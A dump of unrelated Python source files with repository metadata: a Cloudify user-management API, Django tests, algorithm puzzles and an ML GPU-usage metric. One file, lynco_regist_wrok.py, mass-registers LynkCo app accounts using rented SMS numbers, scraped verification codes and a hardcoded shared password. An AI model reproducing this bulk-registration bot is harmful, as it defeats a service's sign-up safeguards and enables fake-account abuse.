pygame.time.wait(30000) | 34.101695 | 73 | 0.638171 | 416 | 2,012 | 3.072115 | 0.228365 | 0.039124 | 0.030516 | 0.195618 | 0.369327 | 0.349765 | 0.349765 | 0.21831 | 0.124413 | 0.07903 | 0 | 0.2 | 0.107853 | 2,012 | 59 | 74 | 34.101695 | 0.511978 | 0.12326 | 0 | 0.177778 | 0 | 0 | 0.019932 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.022222 | 0 | 0.022222 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4847f5739e2a2a4fe3f2279bc69fc734031f35e3 | 5,610 | py | Python | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | rest-service/manager_rest/rest/resources_v3/users.py | TS-at-WS/cloudify-manager | 3e062e8dec16c89d2ab180d0b761cbf76d3f7ddc | [
"Apache-2.0"
] | null | null | null | #########
# Copyright (c) 2016 GigaSpaces Technologies Ltd. All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# * See the License for the specific language governing permissions and
# * limitations under the License.
from flask_security import current_user
from manager_rest import constants
from manager_rest.storage import models, user_datastore
from manager_rest.security.authorization import authorize
from manager_rest.security import (SecuredResource,
MissingPremiumFeatureResource)
from manager_rest.manager_exceptions import BadParametersError
from .. import rest_decorators, rest_utils
from ..responses_v3 import UserResponse
try:
from cloudify_premium.multi_tenancy.secured_tenant_resource \
import SecuredMultiTenancyResource
except ImportError:
SecuredMultiTenancyResource = MissingPremiumFeatureResource
class User(SecuredResource):
@authorize('user_get_self')
@rest_decorators.marshal_with(UserResponse)
def get(self):
"""
Get details for the current user
"""
return user_datastore.get_user(current_user.username)
class Users(SecuredMultiTenancyResource):
@authorize('user_list')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.create_filters(models.User)
@rest_decorators.paginate
@rest_decorators.sortable(models.User)
@rest_decorators.search('username')
def get(self, multi_tenancy, _include=None, filters=None, pagination=None,
sort=None, search=None, **kwargs):
"""
List users
"""
return multi_tenancy.list_users(
_include,
filters,
pagination,
sort,
search
)
@authorize('user_create')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.no_external_authenticator('create user')
def put(self, multi_tenancy):
"""
Create a user
"""
request_dict = rest_utils.get_json_and_verify_params(
{
'username': {
'type': unicode,
},
'password': {
'type': unicode,
},
'role': {
'type': unicode,
'optional': True,
},
}
)
# The password shouldn't be validated here
password = request_dict.pop('password')
password = rest_utils.validate_and_decode_password(password)
rest_utils.validate_inputs(request_dict)
role = request_dict.get('role', constants.DEFAULT_SYSTEM_ROLE)
rest_utils.verify_role(role, is_system_role=True)
return multi_tenancy.create_user(
request_dict['username'],
password,
role,
)
class UsersId(SecuredMultiTenancyResource):
@authorize('user_update')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Set password/role for a certain user
"""
request_dict = rest_utils.get_json_and_verify_params()
password = request_dict.get('password')
role_name = request_dict.get('role')
if password:
if role_name:
raise BadParametersError('Both `password` and `role` provided')
password = rest_utils.validate_and_decode_password(password)
return multi_tenancy.set_user_password(username, password)
elif role_name:
rest_utils.verify_role(role_name, is_system_role=True)
return multi_tenancy.set_user_role(username, role_name)
else:
raise BadParametersError('Neither `password` nor `role` provided')
@authorize('user_get')
@rest_decorators.marshal_with(UserResponse)
def get(self, username, multi_tenancy):
"""
Get details for a single user
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.get_user(username)
@authorize('user_delete')
@rest_decorators.marshal_with(UserResponse)
@rest_decorators.no_external_authenticator('delete user')
def delete(self, username, multi_tenancy):
"""
Delete a user
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.delete_user(username)
class UsersActive(SecuredMultiTenancyResource):
@authorize('user_set_activated')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Activate a user
"""
request_dict = rest_utils.get_json_and_verify_params({'action'})
if request_dict['action'] == 'activate':
return multi_tenancy.activate_user(username)
else:
return multi_tenancy.deactivate_user(username)
class UsersUnlock(SecuredMultiTenancyResource):
@authorize('user_unlock')
@rest_decorators.marshal_with(UserResponse)
def post(self, username, multi_tenancy):
"""
Unlock user account
"""
rest_utils.validate_inputs({'username': username})
return multi_tenancy.unlock_user(username)
| 34.207317 | 79 | 0.659893 | 595 | 5,610 | 5.984874 | 0.287395 | 0.057287 | 0.045493 | 0.056164 | 0.305251 | 0.276327 | 0.276327 | 0.242909 | 0.18843 | 0.172423 | 0 | 0.002149 | 0.253476 | 5,610 | 163 | 80 | 34.417178 | 0.848138 | 0.145633 | 0 | 0.198113 | 0 | 0 | 0.067815 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075472 | false | 0.09434 | 0.09434 | 0 | 0.311321 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
48514c4855c82f6511561bc091163063091c1e9c | 664 | py | Python | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | 1 | 2020-09-24T10:38:53.000Z | 2020-09-24T10:38:53.000Z | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | null | null | null | ptranking/ltr_adhoc/util/one_hot_utils.py | junj2ejj/ptranking.github.io | 06fa9751dd2eca89749ba4bb9641e4272cfc30a1 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Description
"""
import torch
from ptranking.ltr_global import global_gpu as gpu
def get_one_hot_reprs(batch_stds):
""" Get one-hot representation of batch ground-truth labels """
batch_size = batch_stds.size(0)
hist_size = batch_stds.size(1)
int_batch_stds = batch_stds.type(torch.cuda.LongTensor) if gpu else batch_stds.type(torch.LongTensor)
hot_batch_stds = torch.cuda.FloatTensor(batch_size, hist_size, 3) if gpu else torch.FloatTensor(batch_size, hist_size, 3)
hot_batch_stds.zero_()
hot_batch_stds.scatter_(2, torch.unsqueeze(int_batch_stds, 2), 1)
return hot_batch_stds
| 30.181818 | 125 | 0.74247 | 105 | 664 | 4.409524 | 0.428571 | 0.213823 | 0.103672 | 0.073434 | 0.12527 | 0.12527 | 0 | 0 | 0 | 0 | 0 | 0.014109 | 0.146084 | 664 | 21 | 126 | 31.619048 | 0.802469 | 0.167169 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.2 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
485f7ffc14de09acdf65c094b7c9e15395d4ca1b | 1,001 | py | Python | problems/095.py | JoshKarpel/Euler | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | 1 | 2017-09-20T22:26:24.000Z | 2017-09-20T22:26:24.000Z | problems/095.py | JoshKarpel/euler-python | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | null | null | null | problems/095.py | JoshKarpel/euler-python | 9c4a89cfe4b0114d84a82e2b2894c7b8af815e93 | [
"MIT"
] | null | null | null | from problems import utils, mymath
@utils.memoize
def sum_proper_factors(n):
return sum(mymath.proper_factorization(n))
def solve():
upper_bound = 1000000
chains = dict()
for start_number in range(1, upper_bound):
chain = [start_number]
current_number = sum_proper_factors(start_number)
while current_number != start_number:
if current_number > upper_bound or current_number == 0 or len(chain) > 100:
break
elif current_number in chains:
chain += chains[current_number]
break
else:
chain.append(current_number)
current_number = sum_proper_factors(current_number)
if current_number == start_number:
chains[start_number] = chain
chain_lengths = {i: len(chains[i]) for i in chains}
max_key = mymath.key_of_max_value(chain_lengths)
return min(chains[max_key])
if __name__ == '__main__':
print(solve())
| 26.342105 | 87 | 0.632368 | 122 | 1,001 | 4.852459 | 0.385246 | 0.219595 | 0.081081 | 0.074324 | 0.118243 | 0.118243 | 0 | 0 | 0 | 0 | 0 | 0.016807 | 0.286713 | 1,001 | 37 | 88 | 27.054054 | 0.812325 | 0 | 0 | 0.076923 | 0 | 0 | 0.007992 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.038462 | 0.038462 | 0.192308 | 0.038462 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
486936b454230e71425f5f21ffabf8c3b40a119e | 595 | py | Python | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | 3 | 2021-05-15T08:18:09.000Z | 2021-05-17T04:41:57.000Z | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | null | null | null | DMOJ/CCC/slot machine.py | eddiegz/Personal-C | f7869826216e5c665f8f646502141f0dc680e545 | [
"MIT"
] | null | null | null | quarter=int(input())
p1=int(input())
p2=int(input())
p3=int(input())
time=0
while quarter>0:
if quarter == 0:
continue
p1+=1
quarter-=1
time+=1
if p1==35:
quarter+=30
p1=0
if quarter == 0:
continue
time+=1
p2+=1
quarter-=1
if p2==100:
p2=0
quarter+=60
if quarter == 0:
continue
p3+=1
time+=1
quarter-=1
if p3==10:
quarter+=9
p3=0
print(f'Martha plays {time} times before going broke.')
| 16.081081 | 56 | 0.438655 | 77 | 595 | 3.38961 | 0.337662 | 0.122605 | 0.114943 | 0.206897 | 0.145594 | 0 | 0 | 0 | 0 | 0 | 0 | 0.122024 | 0.435294 | 595 | 37 | 57 | 16.081081 | 0.654762 | 0 | 0 | 0.387097 | 0 | 0 | 0.080357 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.032258 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
486d212547e00f7831ca70c40d4c968f71b4de71 | 4,575 | py | Python | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | LynkCoHelper/lynco_regist_wrok.py | 21haoshaonian/LynkCoHelper | b4e5d67583190bf09fe44902499c3a99463b4df5 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import threading
import time
import base64
from lynkco_app_request import lynkco_app_request
from com.uestcit.api.gateway.sdk.auth.aes import aes as AES
from sms_request import sms_request
import json
import sys
import os
import re
class lynco_regist_wrok(threading.Thread):
"""新开线程处理任务"""
def __init__(self, config):
# 初始化线程
threading.Thread.__init__(self)
# 缓存配置信息
self.config = config
self.project_id = self.config['sms_platform']['project_id']
self.max_count = int(self.config['sms_platform']['count'])
self.sms_request = sms_request()
# 缓存APPKEY(因为存储的是base64后的值,所以需要base64解码一次)
self.app_key = base64.b64decode(self.config['api_geteway']['app_key']).decode('utf-8')
# 缓存APPSECRET(因为存储的是base64后的值,所以需要base64解码一次)
self.app_secret = base64.b64decode(self.config['api_geteway']['app_secret']).decode('utf-8')
# 缓存AESKEY(因为存储的是两次base64后的值,所以需要base64解码两次)
self.aes_key = base64.b64decode(base64.b64decode(self.config['aes_key']).decode('utf-8')).decode('utf-8')
self.AES = AES(self.aes_key)
self.lynkco_app_request = lynkco_app_request(self.app_key, self.app_secret)
def run(self):
"""线程开始的方法"""
print ("开始注册任务 " + time.strftime('%Y-%m-%d %H:%M:%S'))
self.token = self.get_token()
if('' == self.token):
return 0
phone_list = []
while len(phone_list) < self.max_count:
phone = self.regist()
if('' == phone):
continue
phone_list.append({ 'username': phone, 'password': 'a123456789' })
with open(sys.path[0] + '/phone_list_' + time.strftime('%Y%m%d%H%M%S') + '.json', 'w') as json_file:
json_file.write(json.dumps(phone_list,ensure_ascii = False))
print ("注册执行完成任务 " + time.strftime('%Y-%m-%d %H:%M:%S'))
def get_token(self):
"""登录获取token"""
sms_username = self.config['sms_platform']['username']
sms_password = self.config['sms_platform']['password']
context = self.sms_request.login(sms_username, sms_password)
array = context.split('|')
if(int(array[0]) != 1):
print("短信账户登录失败:" + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
token = array[1]
print("短信账户登录成功,token:" + token + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return token
def regist(self):
"""App端操作流程"""
# 获取一个手机号
context = self.sms_request.get_phone(self.token, self.project_id)
array = context.split('|')
if(int(array[0]) != 1):
print("短信账户获取手机号失败:" + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
phone = array[1]
# 发送注册短信
response = self.lynkco_app_request.get_vcode_by_regist(phone)
if response['code'] != 'success':
print("发送注册短信失败" + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
# 循环10次获取短信内容,每次获取失败等待3秒钟
vcode = ''
fail_count = 0;
while fail_count < 10:
context = self.sms_request.get_phone_msg(self.token, self.project_id, phone)
array = context.split('|')
if(int(array[0]) != 1):
print("短信账户获取验证码内容失败:" + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
fail_count += 1
time.sleep(3)
else:
context = array[1]
# 此处需要正则取验证码
pattern = re.compile(r'\d{6}')
result = pattern.findall(context)
if(len(result) != 1):
print("短信账户解析验证码内容失败:" + context + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
else:
vcode = result[0]
print("短信账户获取验证码内容成功:" + vcode + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
break
if('' == vcode):
return ''
# 发送注册
password = self.AES.encrypt('a123456789')
response = self.lynkco_app_request.regist(phone, password, vcode)
if response['code'] != 'success':
print("发送注册接口失败" + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return ''
# 尝试登陆一次
response = self.lynkco_app_request.login(phone, password)
if response['code'] != 'success':
print("尝试接口失败" + response['message'] + " " + time.strftime('%Y-%m-%d %H:%M:%S'))
return phone
return phone | 39.782609 | 113 | 0.551257 | 535 | 4,575 | 4.571963 | 0.250467 | 0.058872 | 0.063778 | 0.068684 | 0.32175 | 0.237531 | 0.213818 | 0.182747 | 0.153312 | 0.091169 | 0 | 0.022936 | 0.285246 | 4,575 | 115 | 114 | 39.782609 | 0.725076 | 0.055956 | 0 | 0.202247 | 0 | 0 | 0.136427 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.044944 | false | 0.067416 | 0.11236 | 0 | 0.269663 | 0.123596 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
48769d3fe736152c54bf8b09ad3360ea09bd2080 | 1,181 | py | Python | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null | scripts/12865.py | JihoChoi/BOJ | 08974a9db8ebaa299ace242e951cac53ab55fc4d | [
"MIT"
] | null | null | null |
"""
TAG: 0-1 Knapsack Problem, Dynamic Programming (DP), O(nW)
References:
- https://www.geeksforgeeks.org/0-1-knapsack-problem-dp-10/
weights and values of n items, capacity -> max value
"""
N, W = map(int, input().split()) # number of items, capacity
weights = []
values = []
for i in range(N):
w, v = map(int, input().split())
weights.append(w)
values.append(v)
def knapsack(W, weights, values, n):
dp = [[0 for x in range(W+1)] for x in range(n+1)]
for i in range(n+1):
for w in range(W+1):
if i == 0 or w == 0:
dp[i][w] = 0
elif weights[i-1] <= w:
dp[i][w] = max(values[i-1] + dp[i-1][w - weights[i-1]], dp[i-1][w])
else:
dp[i][w] = dp[i-1][w]
return dp[n][W]
print(knapsack(W, weights, values, N))
# Naive
"""
def knapsack(W, weights, values, n):
if n == 0 or W == 0: # base
return 0
if (weights[n-1] > W):
return knapsack(W, weights, values, n-1)
else:
return max(
values[n-1] + knapsack(W - weights[n-1], weights, values, n-1),
knapsack(W, weights, values, n-1)
)
"""
| 21.87037 | 83 | 0.516511 | 191 | 1,181 | 3.193717 | 0.246073 | 0.02623 | 0.157377 | 0.180328 | 0.337705 | 0.239344 | 0 | 0 | 0 | 0 | 0 | 0.035237 | 0.303133 | 1,181 | 53 | 84 | 22.283019 | 0.705954 | 0.187976 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.052632 | false | 0 | 0 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
487c49f921ee4340fdfc140e8ff73bccf0d40cf6 | 3,273 | py | Python | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | null | null | null | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | null | null | null | test/broken_test_log.py | Brimizer/python-ant | 2b99693b4754156d401a0bd90e02357e8358c1f5 | [
"MIT"
] | 1 | 2019-01-11T22:22:06.000Z | 2019-01-11T22:22:06.000Z | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2011, Martín Raúl Villalba
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
##############################################################################
LOG_LOCATION = '/tmp/python-ant.logtest.ant'
import unittest
from ant.core.log import *
class LogReaderTest(unittest.TestCase):
def setUp(self):
lw = LogWriter(LOG_LOCATION)
lw.logOpen()
lw.logRead(b'\x01')
lw.logWrite(b'\x00')
lw.logRead(b'TEST')
lw.logClose()
lw.close()
self.log = LogReader(LOG_LOCATION)
def test_open_close(self):
self.assertTrue(self.log.is_open)
self.log.close()
self.assertFalse(self.log.is_open)
self.log.open(LOG_LOCATION)
self.assertTrue(self.log.is_open)
def test_read(self):
t1 = self.log.read()
t2 = self.log.read()
t3 = self.log.read()
t4 = self.log.read()
t5 = self.log.read()
self.assertEquals(self.log.read(), '')
self.assertEquals(t1[0], EVENT_OPEN)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t1), 2)
self.assertEquals(t2[0], EVENT_READ)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t2), 3)
self.assertEquals(t2[2], b'\x01')
self.assertEquals(t3[0], EVENT_WRITE)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t3), 3)
self.assertEquals(t3[2], '\x00')
self.assertEquals(t4[0], EVENT_READ)
self.assertEquals(t4[2], 'TEST')
self.assertEquals(t5[0], EVENT_CLOSE)
self.assertTrue(isinstance(t1[1], int))
self.assertEquals(len(t5), 2)
class LogWriterTest(unittest.TestCase):
def setUp(self):
self.log = LogWriter(LOG_LOCATION)
def test_open_close(self):
self.assertTrue(self.log.is_open)
self.log.close()
self.assertFalse(self.log.is_open)
self.log.open(LOG_LOCATION)
self.assertTrue(self.log.is_open)
def test_log(self):
# Redundant, any error in log* methods will cause the LogReader test
# suite to fail.
pass
| 33.397959 | 78 | 0.633364 | 432 | 3,273 | 4.74537 | 0.354167 | 0.061463 | 0.026341 | 0.038049 | 0.299512 | 0.245854 | 0.245854 | 0.245854 | 0.245854 | 0.150244 | 0 | 0.019478 | 0.215704 | 3,273 | 97 | 79 | 33.742268 | 0.77912 | 0.355943 | 0 | 0.339623 | 0 | 0 | 0.026466 | 0.014011 | 0 | 0 | 0 | 0 | 0.433962 | 1 | 0.113208 | false | 0.018868 | 0.037736 | 0 | 0.188679 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4883b0040e8dc5ec47ef273298b6d359bf3bcacc | 2,409 | py | Python | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | EasyRecycle/tests/unittests/core/views/test_BecomeCommercialAPIView.py | YuriyLisovskiy/EasyRecycle | 49f1b84931145a3e95224e411d22ed7701e5bfe0 | [
"MIT"
] | null | null | null | from django.urls import reverse
from rest_framework import status
from rest_framework.test import force_authenticate
from rest_framework_simplejwt.state import User
from core.views import DeactivateSelfAPIView, BecomeCommercialAPIView
from tests.unittests.common import APIFactoryTestCase
class BecomeCommercialAPITestCase(APIFactoryTestCase):
def setUp(self) -> None:
super(BecomeCommercialAPITestCase, self).setUp()
self.view = BecomeCommercialAPIView.as_view()
self.user = User.objects.get(username='User')
self.user_2 = User.objects.get(username='User2')
self.user_3 = User.objects.get(username='User3')
self.commercial_user = User.objects.get(username='Commercial')
def test_BecomeCommercialValid(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qwerty'
})
force_authenticate(request, self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertTrue(User.objects.get(username='User').is_commercial)
def test_BecomeCommercialInvalid(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qerty'
})
force_authenticate(request, self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_BecomeCommercialUnauthenticated(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qwerty'
})
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
def test_BecomeCommercialNoData(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'))
force_authenticate(request, self.user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
def test_BecomeCommercialAlreadyCommercial(self):
request = self.request_factory.put(reverse('api_v1:core:become_commercial'), {
'password': 'qwerty'
})
force_authenticate(request, self.commercial_user)
response = self.view(request)
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)
| 42.263158 | 86 | 0.71565 | 264 | 2,409 | 6.329545 | 0.246212 | 0.09216 | 0.041891 | 0.065829 | 0.576302 | 0.527229 | 0.527229 | 0.527229 | 0.527229 | 0.527229 | 0 | 0.012214 | 0.184309 | 2,409 | 56 | 87 | 43.017857 | 0.838168 | 0 | 0 | 0.468085 | 0 | 0 | 0.094645 | 0.060191 | 0 | 0 | 0 | 0 | 0.12766 | 1 | 0.12766 | false | 0.085106 | 0.12766 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6f8edf6b803563f114318f388210647b9924420a | 11,263 | py | Python | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | 1 | 2021-08-11T19:43:38.000Z | 2021-08-11T19:43:38.000Z | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | null | null | null | avalanche/evaluation/metrics/gpu_usage.py | aishikhar/avalanche | 39c361aba1663795ed33f093ab2e15cc5792026e | [
"MIT"
] | 1 | 2021-04-09T08:10:27.000Z | 2021-04-09T08:10:27.000Z | ################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Vincenzo Lomonaco, Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import GPUtil
from threading import Thread
import time
import warnings
from typing import Optional, TYPE_CHECKING, List
from avalanche.evaluation import Metric, PluginMetric
from avalanche.evaluation.metric_results import MetricValue, MetricResult
from avalanche.evaluation.metric_utils import get_metric_name, \
phase_and_task, stream_type
if TYPE_CHECKING:
from avalanche.training import BaseStrategy
class MaxGPU(Metric[float]):
"""
The standalone GPU usage metric.
Important: this metric approximates the real maximum GPU percentage
usage since it sample at discrete amount of time the GPU values.
Instances of this metric keeps the maximum GPU usage percentage detected.
The `start_thread` method starts the usage tracking.
The `stop_thread` method stops the tracking.
The result, obtained using the `result` method, is the usage in mega-bytes.
The reset method will bring the metric to its initial state. By default
this metric in its initial state will return an usage value of 0.
"""
def __init__(self, gpu_id, every=0.5):
"""
Creates an instance of the GPU usage metric.
:param gpu_id: GPU device ID.
:param every: seconds after which update the maximum GPU
usage
"""
self.every = every
self.gpu_id = gpu_id
n_gpus = len(GPUtil.getGPUs())
if n_gpus == 0:
warnings.warn("Your system has no GPU!")
self.gpu_id = None
elif gpu_id < 0:
warnings.warn("GPU metric called with negative GPU id."
"GPU logging disabled")
self.gpu_id = None
else:
if gpu_id >= n_gpus:
warnings.warn(f"GPU {gpu_id} not found. Using GPU 0.")
self.gpu_id = 0
self.thread = None
"""
Thread executing GPU monitoring code
"""
self.stop_f = False
"""
Flag to stop the thread
"""
self.max_usage = 0
"""
Main metric result. Max GPU usage.
"""
def _f(self):
"""
Until a stop signal is encountered,
this function monitors each `every` seconds
the maximum amount of GPU used by the process
"""
start_time = time.monotonic()
while not self.stop_f:
# GPU percentage
gpu_perc = GPUtil.getGPUs()[self.gpu_id].load * 100
if gpu_perc > self.max_usage:
self.max_usage = gpu_perc
time.sleep(self.every - ((time.monotonic() - start_time)
% self.every))
def start_thread(self):
if self.gpu_id:
assert not self.thread, "Trying to start thread " \
"without joining the previous."
self.thread = Thread(target=self._f, daemon=True)
self.thread.start()
def stop_thread(self):
if self.thread:
self.stop_f = True
self.thread.join()
self.stop_f = False
self.thread = None
def reset(self) -> None:
"""
Resets the metric.
:return: None.
"""
self.max_usage = 0
def result(self) -> Optional[float]:
"""
Returns the max GPU percentage value.
:return: The percentage GPU usage as a float value in range [0, 1].
"""
return self.max_usage
class MinibatchMaxGPU(PluginMetric[float]):
"""
The Minibatch Max GPU metric.
This plugin metric only works at training time.
"""
def __init__(self, gpu_id, every=0.5):
